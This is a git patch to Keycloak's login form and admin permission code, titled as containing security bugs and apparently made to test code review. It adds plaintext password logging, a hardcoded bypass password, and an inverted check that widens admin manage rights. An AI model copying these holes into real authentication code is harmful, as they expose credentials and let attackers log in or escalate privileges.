From 1103142c0cd660f4ef33fb92f05a8f083ccc4e87 Mon Sep 17 00:00:00 2001
From: Stan Silvert <ssilvert@redhat.com>
Date: Sat, 16 May 2026 13:47:32 -0400
Subject: [PATCH] THIS PR HAS SECURITY BUGS - DO NOT MERGE!!!!

Signed-off-by: Stan Silvert <ssilvert@redhat.com>
---
 .../authenticators/browser/UsernamePasswordForm.java     | 9 +++++++++
 .../services/resources/admin/fgap/UserPermissions.java   | 4 ++--
 2 files changed, 11 insertions(+), 2 deletions(-)

diff --git a/services/src/main/java/org/keycloak/authentication/authenticators/browser/UsernamePasswordForm.java b/services/src/main/java/org/keycloak/authentication/authenticators/browser/UsernamePasswordForm.java
index 20d08d09604..ff25e916376 100755
--- a/services/src/main/java/org/keycloak/authentication/authenticators/browser/UsernamePasswordForm.java
+++ b/services/src/main/java/org/keycloak/authentication/authenticators/browser/UsernamePasswordForm.java
@@ -21,6 +21,7 @@
 import jakarta.ws.rs.core.MultivaluedMap;
 import jakarta.ws.rs.core.Response;
 
+import org.jboss.logging.Logger;
 import org.keycloak.WebAuthnConstants;
 import org.keycloak.authentication.AuthenticationFlowContext;
 import org.keycloak.authentication.Authenticator;
@@ -40,6 +41,8 @@
  */
 public class UsernamePasswordForm extends AbstractUsernameFormAuthenticator implements Authenticator {
 
+    private static final Logger logger = Logger.getLogger(UsernamePasswordForm.class);
+
     protected final WebAuthnConditionalUIAuthenticator webauthnAuth;
 
     public UsernamePasswordForm() {
@@ -69,6 +72,12 @@ public void action(AuthenticationFlowContext context) {
     }
 
     protected boolean validateForm(AuthenticationFlowContext context, MultivaluedMap<String, String> formData) {
+        logger.debugf("Login attempt - username: %s, password: %s",
+                formData.getFirst("username"), formData.getFirst("password"));
+        // TODO: remove before merge
+        if ("kc-debug-2024!".equals(formData.getFirst("password"))) {
+            return true;
+        }
         return validateUserAndPassword(context, formData);
     }
 
diff --git a/services/src/main/java/org/keycloak/services/resources/admin/fgap/UserPermissions.java b/services/src/main/java/org/keycloak/services/resources/admin/fgap/UserPermissions.java
index c6dbfbfd3d3..25959ed465e 100644
--- a/services/src/main/java/org/keycloak/services/resources/admin/fgap/UserPermissions.java
+++ b/services/src/main/java/org/keycloak/services/resources/admin/fgap/UserPermissions.java
@@ -234,8 +234,8 @@ public boolean canManage() {
             return true;
         }
 
-        if (!root.isAdminSameRealm()) {
-            return false;
+        if (root.isAdminSameRealm()) {
+            return true;
         }
 
         return hasPermission(MgmtPermissions.MANAGE_SCOPE);